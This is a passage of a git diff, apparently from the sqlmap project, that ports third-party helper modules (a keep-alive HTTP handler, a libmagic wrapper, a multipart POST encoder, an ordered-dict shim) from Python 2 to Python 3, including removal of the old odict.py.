if hasattr(req, 'selector'): + h.putrequest(req.get_method() or 'POST', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + else: + h.putrequest(req.get_method() or 'POST', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + if 'Content-type' not in req.headers: + h.putheader('Content-type', + 'application/x-www-form-urlencoded') + if 'Content-length' not in req.headers: + h.putheader('Content-length', '%d' % len(data)) + else: + if hasattr(req, 'selector'): + h.putrequest(req.get_method() or 'GET', req.selector, skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + else: + h.putrequest(req.get_method() or 'GET', req.get_selector(), skip_host=req.has_header("Host"), skip_accept_encoding=req.has_header("Accept-encoding")) + except (socket.error, _http_client.HTTPException) as err: + raise _urllib.error.URLError(err) + + if 'Connection' not in req.headers: + req.headers['Connection'] = 'keep-alive' -class HTTPResponse(httplib.HTTPResponse): + for args in self.parent.addheaders: + if args[0] not in req.headers: + h.putheader(*args) + for k, v in req.headers.items(): + h.putheader(k, v) + h.endheaders() + if req.data: + h.send(data) + + def _get_connection(self, host): + return NotImplementedError +class HTTPHandler(KeepAliveHandler, _urllib.request.HTTPHandler): + def __init__(self): + KeepAliveHandler.__init__(self) + + def http_open(self, req): + return self.do_open(req) + + def _get_connection(self, host): + return HTTPConnection(host) + +class HTTPSHandler(KeepAliveHandler, _urllib.request.HTTPSHandler): + def __init__(self, ssl_factory=None): + KeepAliveHandler.__init__(self) + if not ssl_factory: + try: + import sslfactory + ssl_factory = sslfactory.get_factory() + except ImportError: + pass + self._ssl_factory = ssl_factory + + def https_open(self, req): + return self.do_open(req) + + def _get_connection(self, host): + try: return self._ssl_factory.get_https_connection(host) + except AttributeError: return HTTPSConnection(host) + +class HTTPResponse(_http_client.HTTPResponse): # we need to subclass HTTPResponse in order to # 1) add readline() and readlines() methods # 2) add close_connection() methods @@ -232,25 +398,39 @@ class HTTPResponse(httplib.HTTPResponse): def __init__(self, sock, debuglevel=0, strict=0, method=None): if method: # the httplib in python 2.3 uses the method arg - httplib.HTTPResponse.__init__(self, sock, debuglevel, method) + _http_client.HTTPResponse.__init__(self, sock, debuglevel, method) else: # 2.2 doesn't - httplib.HTTPResponse.__init__(self, sock, debuglevel) + _http_client.HTTPResponse.__init__(self, sock, debuglevel) self.fileno = sock.fileno + self.code = None self._method = method - self._rbuf = '' + self._rbuf = b"" self._rbufsize = 8096 self._handler = None # inserted by the handler later self._host = None # (same) self._url = None # (same) + self._connection = None # (same) - _raw_read = httplib.HTTPResponse.read + _raw_read = _http_client.HTTPResponse.read + + def close(self): + if self.fp: + self.fp.close() + self.fp = None + if self._handler: + self._handler._request_closed(self, self._host, + self._connection) + + # Note: Patch for Python3 (otherwise, connections won't be reusable) + def _close_conn(self): + self.close() def close_connection(self): + self._handler._remove_connection(self._host, self._connection, close=1) self.close() - self._handler._remove_connection(self._host, close=1) def info(self): - return self.msg + return self.headers def geturl(self): return self._url @@ -268,11 +448,11 @@ def read(self, amt=None): return s s = self._rbuf + self._raw_read(amt) - self._rbuf = '' + self._rbuf = b"" return s def readline(self, limit=-1): - data = "" + data = b"" i = self._rbuf.find('\n') while i < 0 and not (0 < limit <= len(self._rbuf)): new = self._raw_read(self._rbufsize) @@ -299,46 +479,12 @@ def readlines(self, sizehint = 0): return list -class HTTPConnection(httplib.HTTPConnection): +class HTTPConnection(_http_client.HTTPConnection): # use the modified response class response_class = HTTPResponse - _headers = None - - def clearheaders(self): - self._headers = {} - - def putheader(self, header, value): - """Send a request header line to the server. - For example: h.putheader('Accept', 'text/html') - """ - if self.__state != _CS_REQ_STARTED: - raise CannotSendHeader() - - self._headers[header] = value - - def endheaders(self): - """Indicate that the last header line has been sent to the server.""" - - if self.__state == _CS_REQ_STARTED: - self.__state = _CS_REQ_SENT - else: - raise CannotSendHeader() - - for header in ('Host', 'Accept-Encoding'): - if header in self._headers: - str = '%s: %s' % (header, self._headers[header]) - self._output(str) - del self._headers[header] - - for header, value in self._headers.items(): - str = '%s: %s' % (header, value) - self._output(str) - - self._send_output() - - def send(self, str): - httplib.HTTPConnection.send(self, unicodeencode(str, kb.pageEncoding)) +class HTTPSConnection(_http_client.HTTPSConnection): + response_class = HTTPResponse ######################################################################### ##### TEST FUNCTIONS @@ -348,85 +494,86 @@ def error_handler(url): global HANDLE_ERRORS orig = HANDLE_ERRORS keepalive_handler = HTTPHandler() - opener = urllib2.build_opener(keepalive_handler) - urllib2.install_opener(opener) + opener = _urllib.request.build_opener(keepalive_handler) + _urllib.request.install_opener(opener) pos = {0: 'off', 1: 'on'} for i in (0, 1): - print " fancy error handling %s (HANDLE_ERRORS = %i)" % (pos[i], i) + print(" fancy error handling %s (HANDLE_ERRORS = %i)" % (pos[i], i)) HANDLE_ERRORS = i try: - fo = urllib2.urlopen(url) + fo = _urllib.request.urlopen(url) foo = fo.read() fo.close() try: status, reason = fo.status, fo.reason except AttributeError: status, reason = None, None - except IOError, e: - print " EXCEPTION: %s" % e + except IOError as e: + print(" EXCEPTION: %s" % e) raise else: - print " status = %s, reason = %s" % (status, reason) + print(" status = %s, reason = %s" % (status, reason)) HANDLE_ERRORS = orig hosts = keepalive_handler.open_connections() - print "open connections:", ' '.join(hosts) + print("open connections:", hosts) keepalive_handler.close_all() def continuity(url): - import md5 + from hashlib import md5 format = '%25s: %s' # first fetch the file with the normal http handler - opener = urllib2.build_opener() - urllib2.install_opener(opener) - fo = urllib2.urlopen(url) + opener = _urllib.request.build_opener() + _urllib.request.install_opener(opener) + fo = _urllib.request.urlopen(url) foo = fo.read() fo.close() - m = md5.new(foo) - print format % ('normal urllib', m.hexdigest()) + m = md5(foo) + print(format % ('normal urllib', m.hexdigest())) # now install the keepalive handler and try again - opener = urllib2.build_opener(HTTPHandler()) - urllib2.install_opener(opener) + opener = _urllib.request.build_opener(HTTPHandler()) + _urllib.request.install_opener(opener) - fo = urllib2.urlopen(url) + fo = _urllib.request.urlopen(url) foo = fo.read() fo.close() - m = md5.new(foo) - print format % ('keepalive read', m.hexdigest()) + m = md5(foo) + print(format % ('keepalive read', m.hexdigest())) - fo = urllib2.urlopen(url) + fo = _urllib.request.urlopen(url) foo = '' while 1: f = fo.readline() if f: foo = foo + f else: break fo.close() - m = md5.new(foo) - print format % ('keepalive readline', m.hexdigest()) + m = md5(foo) + print(format % ('keepalive readline', m.hexdigest())) def comp(N, url): - print ' making %i connections to:\n %s' % (N, url) + print(' making %i connections to:\n %s' % (N, url)) sys.stdout.write(' first using the normal urllib handlers') # first use normal opener - opener = urllib2.build_opener() - urllib2.install_opener(opener) + opener = _urllib.request.build_opener() + _urllib.request.install_opener(opener) t1 = fetch(N, url) - print ' TIME: %.3f s' % t1 + print(' TIME: %.3f s' % t1) sys.stdout.write(' now using the keepalive handler ') # now install the keepalive handler and try again - opener = urllib2.build_opener(HTTPHandler()) - urllib2.install_opener(opener) + opener = _urllib.request.build_opener(HTTPHandler()) + _urllib.request.install_opener(opener) t2 = fetch(N, url) - print ' TIME: %.3f s' % t2 - print ' improvement factor: %.2f' % (t1/t2, ) + print(' TIME: %.3f s' % t2) + print(' improvement factor: %.2f' % (t1/t2, )) def fetch(N, url, delay=0): + import time lens = [] starttime = time.time() - for i in xrange(N): + for i in _range(N): if delay and i > 0: time.sleep(delay) - fo = urllib2.urlopen(url) + fo = _urllib.request.urlopen(url) foo = fo.read() fo.close() lens.append(len(foo)) @@ -436,22 +583,59 @@ def fetch(N, url, delay=0): for i in lens[1:]: j = j + 1 if not i == lens[0]: - print "WARNING: inconsistent length on read %i: %i" % (j, i) + print("WARNING: inconsistent length on read %i: %i" % (j, i)) return diff +def test_timeout(url): + global DEBUG + dbbackup = DEBUG + class FakeLogger: + def debug(self, msg, *args): print(msg % args) + info = warning = error = debug + DEBUG = FakeLogger() + print(" fetching the file to establish a connection") + fo = _urllib.request.urlopen(url) + data1 = fo.read() + fo.close() + + i = 20 + print(" waiting %i seconds for the server to close the connection" % i) + while i > 0: + sys.stdout.write('\r %2i' % i) + sys.stdout.flush() + time.sleep(1) + i -= 1 + sys.stderr.write('\r') + + print(" fetching the file a second time") + fo = _urllib.request.urlopen(url) + data2 = fo.read() + fo.close() + + if data1 == data2: + print(' data are identical') + else: + print(' ERROR: DATA DIFFER') + + DEBUG = dbbackup + + def test(url, N=10): - print "checking error hander (do this on a non-200)" + print("checking error hander (do this on a non-200)") try: error_handler(url) - except IOError, e: - print "exiting - exception will prevent further tests" + except IOError as e: + print("exiting - exception will prevent further tests") sys.exit() - print - print "performing continuity test (making sure stuff isn't corrupted)" + print() + print("performing continuity test (making sure stuff isn't corrupted)") continuity(url) - print - print "performing speed comparison" + print() + print("performing speed comparison") comp(N, url) + print() + print("performing dropped-connection check") + test_timeout(url) if __name__ == '__main__': import time @@ -460,6 +644,6 @@ def test(url, N=10): N = int(sys.argv[1]) url = sys.argv[2] except: - print "%s " % sys.argv[0] + print("%s " % sys.argv[0]) else: test(url, N) diff --git a/thirdparty/magic/magic.py b/thirdparty/magic/magic.py index 3460b4b2eb5..0a5c2575a93 100644 --- a/thirdparty/magic/magic.py +++ b/thirdparty/magic/magic.py @@ -16,10 +16,6 @@ import sys import os.path -import ctypes -import ctypes.util - -from ctypes import c_char_p, c_int, c_size_t, c_void_p class MagicException(Exception): pass @@ -104,15 +100,23 @@ def from_buffer(buffer, mime=False): try: libmagic = None + + import ctypes + import ctypes.util + + from ctypes import c_char_p, c_int, c_size_t, c_void_p + # Let's try to find magic or magic1 dll = ctypes.util.find_library('magic') or ctypes.util.find_library('magic1') # This is necessary because find_library returns None if it doesn't find the library if dll: - libmagic = ctypes.CDLL(dll) + try: + libmagic = ctypes.CDLL(dll) + except WindowsError: + pass if not libmagic or not libmagic._name: - import sys platform_to_lib = {'darwin': ['/opt/local/lib/libmagic.dylib', '/usr/local/lib/libmagic.dylib', '/usr/local/Cellar/libmagic/5.10/lib/libmagic.dylib'], @@ -194,8 +198,8 @@ def magic_load(cookie, filename): magic_compile.restype = c_int magic_compile.argtypes = [magic_t, c_char_p] -except ImportError: - from_file = from_buffer = lambda *args, **kwargs: "unknown" +except (ImportError, OSError): + from_file = from_buffer = lambda *args, **kwargs: MAGIC_UNKNOWN_FILETYPE MAGIC_NONE = 0x000000 # No flags MAGIC_DEBUG = 0x000001 # Turn on debugging @@ -218,3 +222,4 @@ def magic_load(cookie, filename): MAGIC_NO_CHECK_TROFF = 0x040000 # Don't check ascii/troff MAGIC_NO_CHECK_FORTRAN = 0x080000 # Don't check ascii/fortran MAGIC_NO_CHECK_TOKENS = 0x100000 # Don't check ascii/tokens +MAGIC_UNKNOWN_FILETYPE = b"unknown" diff --git a/thirdparty/multipart/multipartpost.py b/thirdparty/multipart/multipartpost.py index b3ea1eebd19..2f2389807ea 100644 --- a/thirdparty/multipart/multipartpost.py +++ b/thirdparty/multipart/multipartpost.py @@ -20,88 +20,95 @@ Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ -import mimetools +import io import mimetypes import os +import re import stat -import StringIO import sys -import urllib -import urllib2 +from lib.core.compat import choose_boundary +from lib.core.convert import getBytes from lib.core.exception import SqlmapDataException - - -class Callable: - def __init__(self, anycallable): - self.__call__ = anycallable +from thirdparty.six.moves import urllib as _urllib # Controls how sequences are uncoded. If true, elements may be given # multiple values by assigning a sequence. -doseq = 1 +doseq = True -class MultipartPostHandler(urllib2.BaseHandler): - handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first +class MultipartPostHandler(_urllib.request.BaseHandler): + handler_order = _urllib.request.HTTPHandler.handler_order - 10 # needs to run first def http_request(self, request): - data = request.get_data() + data = request.data - if data is not None and type(data) != str: + if isinstance(data, dict): v_files = [] v_vars = [] try: for(key, value) in data.items(): - if isinstance(value, file) or hasattr(value, 'file') or isinstance(value, StringIO.StringIO): + if hasattr(value, "fileno") or hasattr(value, "file") or isinstance(value, io.IOBase): v_files.append((key, value)) else: v_vars.append((key, value)) except TypeError: systype, value, traceback = sys.exc_info() - raise SqlmapDataException, "not a valid non-string sequence or mapping object", traceback + raise SqlmapDataException("not a valid non-string sequence or mapping object '%s'" % traceback) if len(v_files) == 0: - data = urllib.urlencode(v_vars, doseq) + data = _urllib.parse.urlencode(v_vars, doseq) else: boundary, data = self.multipart_encode(v_vars, v_files) - contenttype = 'multipart/form-data; boundary=%s' % boundary - #if (request.has_header('Content-Type') and request.get_header('Content-Type').find('multipart/form-data') != 0): - # print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data') - request.add_unredirected_header('Content-Type', contenttype) + contenttype = "multipart/form-data; boundary=%s" % boundary + #if (request.has_header("Content-Type") and request.get_header("Content-Type").find("multipart/form-data") != 0): + # print "Replacing %s with %s" % (request.get_header("content-type"), "multipart/form-data") + request.add_unredirected_header("Content-Type", contenttype) + + request.data = data + + # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4235 + if request.data: + for match in re.finditer(b"(?i)\\s*-{20,}\\w+(\\s+Content-Disposition[^\\n]+\\s+|\\-\\-\\s*)", request.data): + part = match.group(0) + if b'\r' not in part: + request.data = request.data.replace(part, part.replace(b'\n', b"\r\n")) - request.add_data(data) return request - def multipart_encode(vars, files, boundary = None, buf = None): + def multipart_encode(self, vars, files, boundary=None, buf=None): if boundary is None: - boundary = mimetools.choose_boundary() + boundary = choose_boundary() if buf is None: - buf = '' + buf = b"" for (key, value) in vars: - buf += '--%s\r\n' % boundary - buf += 'Content-Disposition: form-data; name="%s"' % key - buf += '\r\n\r\n' + value + '\r\n' + if key is not None and value is not None: + buf += b"--%s\r\n" % getBytes(boundary) + buf += b"Content-Disposition: form-data; name=\"%s\"" % getBytes(key) + buf += b"\r\n\r\n" + getBytes(value) + b"\r\n" for (key, fd) in files: - file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len - filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1] - contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' - buf += '--%s\r\n' % boundary - buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename) - buf += 'Content-Type: %s\r\n' % contenttype - # buf += 'Content-Length: %s\r\n' % file_size + file_size = fd.len if hasattr(fd, "len") else os.fstat(fd.fileno())[stat.ST_SIZE] + filename = fd.name.split("/")[-1] if "/" in fd.name else fd.name.split("\\")[-1] + try: + contenttype = mimetypes.guess_type(filename)[0] or b"application/octet-stream" + except: + # Reference: http://bugs.python.org/issue9291 + contenttype = b"application/octet-stream" + buf += b"--%s\r\n" % getBytes(boundary) + buf += b"Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"\r\n" % (getBytes(key), getBytes(filename)) + buf += b"Content-Type: %s\r\n" % getBytes(contenttype) + # buf += b"Content-Length: %s\r\n" % file_size fd.seek(0) - buf = str(buf) - buf += '\r\n%s\r\n' % fd.read() + buf += b"\r\n%s\r\n" % fd.read() - buf += '--%s--\r\n\r\n' % boundary + buf += b"--%s--\r\n\r\n" % getBytes(boundary) + buf = getBytes(buf) return boundary, buf - multipart_encode = Callable(multipart_encode) - https_request = http_request diff --git a/thirdparty/odict/__init__.py b/thirdparty/odict/__init__.py index 1143598a32c..8571776ae42 100644 --- a/thirdparty/odict/__init__.py +++ b/thirdparty/odict/__init__.py @@ -1,26 +1,8 @@ #!/usr/bin/env python -# -# The BSD License -# -# Copyright 2003-2008 Nicola Larosa, Michael Foord -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in -# all copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN -# THE SOFTWARE. -# -pass +import sys + +if sys.version_info[:2] >= (2, 7): + from collections import OrderedDict +else: + from ordereddict import OrderedDict diff --git a/thirdparty/odict/odict.py b/thirdparty/odict/odict.py deleted file mode 100644 index 9a712b048a2..00000000000 --- a/thirdparty/odict/odict.py +++ /dev/null @@ -1,1402 +0,0 @@ -# odict.py -# An Ordered Dictionary object -# Copyright (C) 2005 Nicola Larosa, Michael Foord -# E-mail: nico AT tekNico DOT net, fuzzyman AT voidspace DOT org DOT uk - -# This software is licensed under the terms of the BSD license. -# http://www.voidspace.org.uk/python/license.shtml -# Basically you're free to copy, modify, distribute and relicense it, -# So long as you keep a copy of the license with it. - -# Documentation at http://www.voidspace.org.uk/python/odict.html -# For information about bugfixes, updates and support, please join the -# Pythonutils mailing list: -# http://groups.google.com/group/pythonutils/ -# Comments, suggestions and bug reports welcome. - -"""A dict that keeps keys in insertion order""" -from __future__ import generators - -__author__ = ('Nicola Larosa ,' - 'Michael Foord ') - -__docformat__ = "restructuredtext en" - -__version__ = '0.2.2' - -__all__ = ['OrderedDict', 'SequenceOrderedDict'] - -import sys -INTP_VER = sys.version_info[:2] -if INTP_VER < (2, 2): - raise RuntimeError("Python v.2.2 or later required") - -import types, warnings - -class _OrderedDict(dict): - """ - A class of dictionary that keeps the insertion order of keys. - - All appropriate methods return keys, items, or values in an ordered way. - - All normal dictionary methods are available. Update and comparison is - restricted to other OrderedDict objects. - - Various sequence methods are available, including the ability to explicitly - mutate the key ordering. - - __contains__ tests: - - >>> d = OrderedDict(((1, 3),)) - >>> 1 in d - 1 - >>> 4 in d - 0 - - __getitem__ tests: - - >>> OrderedDict(((1, 3), (3, 2), (2, 1)))[2] - 1 - >>> OrderedDict(((1, 3), (3, 2), (2, 1)))[4] - Traceback (most recent call last): - KeyError: 4 - - __len__ tests: - - >>> len(OrderedDict()) - 0 - >>> len(OrderedDict(((1, 3), (3, 2), (2, 1)))) - 3 - - get tests: - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.get(1) - 3 - >>> d.get(4) is None - 1 - >>> d.get(4, 5) - 5 - >>> d - OrderedDict([(1, 3), (3, 2), (2, 1)]) - - has_key tests: - - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d.has_key(1) - 1 - >>> d.has_key(4) - 0 - """ - - def __init__(self, init_val=(), strict=False): - """ - Create a new ordered dictionary. Cannot init from a normal dict, - nor from kwargs, since items order is undefined in those cases. - - If the ``strict`` keyword argument is ``True`` (``False`` is the - default) then when doing slice assignment - the ``OrderedDict`` you are - assigning from *must not* contain any keys in the remaining dict. - - >>> OrderedDict() - OrderedDict([]) - >>> OrderedDict({1: 1}) - Traceback (most recent call last): - TypeError: undefined order, cannot get items from dict - >>> OrderedDict({1: 1}.items()) - OrderedDict([(1, 1)]) - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d - OrderedDict([(1, 3), (3, 2), (2, 1)]) - >>> OrderedDict(d) - OrderedDict([(1, 3), (3, 2), (2, 1)]) - """ - self.strict = strict - dict.__init__(self) - if isinstance(init_val, OrderedDict): - self._sequence = init_val.keys() - dict.update(self, init_val) - elif isinstance(init_val, dict): - # we lose compatibility with other ordered dict types this way - raise TypeError('undefined order, cannot get items from dict') - else: - self._sequence = [] - self.update(init_val) - -### Special methods ### - - def __delitem__(self, key): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> del d[3] - >>> d - OrderedDict([(1, 3), (2, 1)]) - >>> del d[3] - Traceback (most recent call last): - KeyError: 3 - >>> d[3] = 2 - >>> d - OrderedDict([(1, 3), (2, 1), (3, 2)]) - >>> del d[0:1] - >>> d - OrderedDict([(2, 1), (3, 2)]) - """ - if isinstance(key, types.SliceType): - # FIXME: efficiency? - keys = self._sequence[key] - for entry in keys: - dict.__delitem__(self, entry) - del self._sequence[key] - else: - # do the dict.__delitem__ *first* as it raises - # the more appropriate error - dict.__delitem__(self, key) - self._sequence.remove(key) - - def __eq__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d == OrderedDict(d) - True - >>> d == OrderedDict(((1, 3), (2, 1), (3, 2))) - False - >>> d == OrderedDict(((1, 0), (3, 2), (2, 1))) - False - >>> d == OrderedDict(((0, 3), (3, 2), (2, 1))) - False - >>> d == dict(d) - False - >>> d == False - False - """ - if isinstance(other, OrderedDict): - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() == other.items()) - else: - return False - - def __lt__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) - >>> c < d - True - >>> d < c - False - >>> d < dict(c) - Traceback (most recent call last): - TypeError: Can only compare with other OrderedDicts - """ - if not isinstance(other, OrderedDict): - raise TypeError('Can only compare with other OrderedDicts') - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() < other.items()) - - def __le__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) - >>> e = OrderedDict(d) - >>> c <= d - True - >>> d <= c - False - >>> d <= dict(c) - Traceback (most recent call last): - TypeError: Can only compare with other OrderedDicts - >>> d <= e - True - """ - if not isinstance(other, OrderedDict): - raise TypeError('Can only compare with other OrderedDicts') - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() <= other.items()) - - def __ne__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> d != OrderedDict(d) - False - >>> d != OrderedDict(((1, 3), (2, 1), (3, 2))) - True - >>> d != OrderedDict(((1, 0), (3, 2), (2, 1))) - True - >>> d == OrderedDict(((0, 3), (3, 2), (2, 1))) - False - >>> d != dict(d) - True - >>> d != False - True - """ - if isinstance(other, OrderedDict): - # FIXME: efficiency? - # Generate both item lists for each compare - return not (self.items() == other.items()) - else: - return True - - def __gt__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) - >>> d > c - True - >>> c > d - False - >>> d > dict(c) - Traceback (most recent call last): - TypeError: Can only compare with other OrderedDicts - """ - if not isinstance(other, OrderedDict): - raise TypeError('Can only compare with other OrderedDicts') - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() > other.items()) - - def __ge__(self, other): - """ - >>> d = OrderedDict(((1, 3), (3, 2), (2, 1))) - >>> c = OrderedDict(((0, 3), (3, 2), (2, 1))) - >>> e = OrderedDict(d) - >>> c >= d - False - >>> d >= c - True - >>> d >= dict(c) - Traceback (most recent call last): - TypeError: Can only compare with other OrderedDicts - >>> e >= d - True - """ - if not isinstance(other, OrderedDict): - raise TypeError('Can only compare with other OrderedDicts') - # FIXME: efficiency? - # Generate both item lists for each compare - return (self.items() >= other.items()) - - def __repr__(self): - """ - Used for __repr__ and __str__ - - >>> r1 = repr(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f')))) - >>> r1 - "OrderedDict([('a', 'b'), ('c', 'd'), ('e', 'f')])" - >>> r2 = repr(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd')))) - >>> r2 - "OrderedDict([('a', 'b'), ('e', 'f'), ('c', 'd')])" - >>> r1 == str(OrderedDict((('a', 'b'), ('c', 'd'), ('e', 'f')))) - True - >>> r2 == str(OrderedDict((('a', 'b'), ('e', 'f'), ('c', 'd')))) - True - """ - return '%s([%s])' % (self.__class__.__name__, ', '.join( - ['(%r, %r)' % (key, self[key]) for key in self._sequence])) - - def __setitem__(self, key, val): - """ - Allows slice assignment, so long as the slice is an OrderedDict - >>> d = OrderedDict() - >>> d['a'] = 'b' - >>> d['b'] = 'a' - >>> d[3] = 12 - >>> d - OrderedDict([('a', 'b'), ('b', 'a'), (3, 12)]) - >>> d[:] = OrderedDict(((1, 2), (2, 3), (3, 4))) - >>> d - OrderedDict([(1, 2), (2, 3), (3, 4)]) - >>> d[::2] = OrderedDict(((7, 8), (9, 10))) - >>> d - OrderedDict([(7, 8), (2, 3), (9, 10)]) - >>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4))) - >>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8))) - >>> d - OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)]) - >>> d = OrderedDict(((0, 1), (1, 2), (2, 3), (3, 4)), strict=True) - >>> d[1:3] = OrderedDict(((1, 2), (5, 6), (7, 8))) - >>> d - OrderedDict([(0, 1), (1, 2), (5, 6), (7, 8), (3, 4)]) - - >>> a = OrderedDict(((0, 1), (1, 2), (2, 3)), strict=True) - >>> a[3] = 4 - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4), (4, 5)]) - Traceback (most recent call last): - ValueError: slice assignment must be from unique keys - >>> a = OrderedDict(((0, 1), (1, 2), (2, 3))) - >>> a[3] = 4 - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[::1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[:2] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a - OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a[::-1] = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> a - OrderedDict([(3, 4), (2, 3), (1, 2), (0, 1)]) - - >>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> d[:1] = 3 - Traceback (most recent call last): - TypeError: slice assignment requires an OrderedDict - - >>> d = OrderedDict([(0, 1), (1, 2), (2, 3), (3, 4)]) - >>> d[:1] = OrderedDict([(9, 8)]) - >>> d - OrderedDict([(9, 8), (1, 2), (2, 3), (3, 4)]) - """ - if isinstance(key, types.SliceType): - if not isinstance(val, OrderedDict): - # FIXME: allow a list of tuples? - raise TypeError('slice assignment requires an OrderedDict') - keys = self._sequence[key] - # NOTE: Could use ``range(*key.indices(len(self._sequence)))`` - indexes = range(len(self._sequence))[key] - if key.step is None: - # NOTE: new slice may not be the same size as the one being - # overwritten ! - # NOTE: What is the algorithm for an impossible slice? - # e.g. d[5:3] - pos = key.start or 0 - del self[key] - newkeys = val.keys() - for k in newkeys: - if k in self: - if self.strict: - raise ValueError('slice assignment must be from ' - 'unique keys') - else: - # NOTE: This removes duplicate keys *first* - # so start position might have changed? - del self[k] - self._sequence = (self._sequence[:pos] + newkeys + - self._sequence[pos:]) - dict.update(self, val) - else: - # extended slice - length of new slice must be the same - # as the one being replaced - if len(keys) != len(val): - raise ValueError('attempt to assign sequence of size %s ' - 'to extended slice of size %s' % (len(val), len(keys))) - # FIXME: efficiency? - del self[key] - item_list = zip(indexes, val.items()) - # smallest indexes first - higher indexes not guaranteed to - # exist - item_list.sort() - for pos, (newkey, newval) in item_list: - if self.strict and newkey in self: - raise ValueError('slice assignment must be from unique' - ' keys') - self.insert(pos, newkey, newval) - else: - if key not in self: - self._sequence.append(key) - dict.__setitem__(self, key, val) - - def __getitem__(self, key): - """ - Allows slicing. Returns an OrderedDict if you slice. - >>> b = OrderedDict([(7, 0), (6, 1), (5, 2), (4, 3), (3, 4), (2, 5), (1, 6)]) - >>> b[::-1] - OrderedDict([(1, 6), (2, 5), (3, 4), (4, 3), (5, 2), (6, 1), (7, 0)]) - >>> b[2:5] - OrderedDict([(5, 2), (4, 3), (3, 4)]) - >>> type(b[2:4]) - - """ - if isinstance(key, types.SliceType): - # FIXME: does this raise the error we want? - keys = self._sequence[key] - # FIXME: efficiency? - return OrderedDict([(entry, self[entry]) for entry in keys]) - else: - return dict.__getitem__(self, key) - - __str__ = __repr__ - - def __setattr__(self, name, value): - """ - Implemented so that accesses to ``sequence`` raise a warning and are - diverted to the new ``setkeys`` method. - """ - if name == 'sequence': - warnings.warn('Use of the sequence attribute is deprecated.' - ' Use the keys method instead.', DeprecationWarning) - # NOTE: doesn't return anything - self.setkeys(value) - else: - # FIXME: do we want to allow arbitrary setting of attributes? - # Or do we want to manage it? - object.__setattr__(self, name, value) - - def __getattr__(self, name): - """ - Implemented so that access to ``sequence`` raises a warning. - - >>> d = OrderedDict() - >>> d.sequence - [] - """ - if name == 'sequence': - warnings.warn('Use of the sequence attribute is deprecated.' - ' Use the keys method instead.', DeprecationWarning) - # NOTE: Still (currently) returns a direct reference. Need to - # because code that uses sequence will expect to be able to - # mutate it in place. - return self._sequence - else: - # raise the appropriate error - raise AttributeError("OrderedDict has no '%s' attribute" % name) - - def __deepcopy__(self, memo): - """ - To allow deepcopy to work with OrderedDict. - - >>> from copy import deepcopy - >>> a = OrderedDict([(1, 1), (2, 2), (3, 3)]) - >>> a['test'] = {} - >>> b = deepcopy(a) - >>> b == a - True - >>> b is a - False - >>> a['test'] is b['test'] - False - """ - from copy import deepcopy - return self.__class__(deepcopy(self.items(), memo), self.strict) - - -### Read-only methods ### - - def 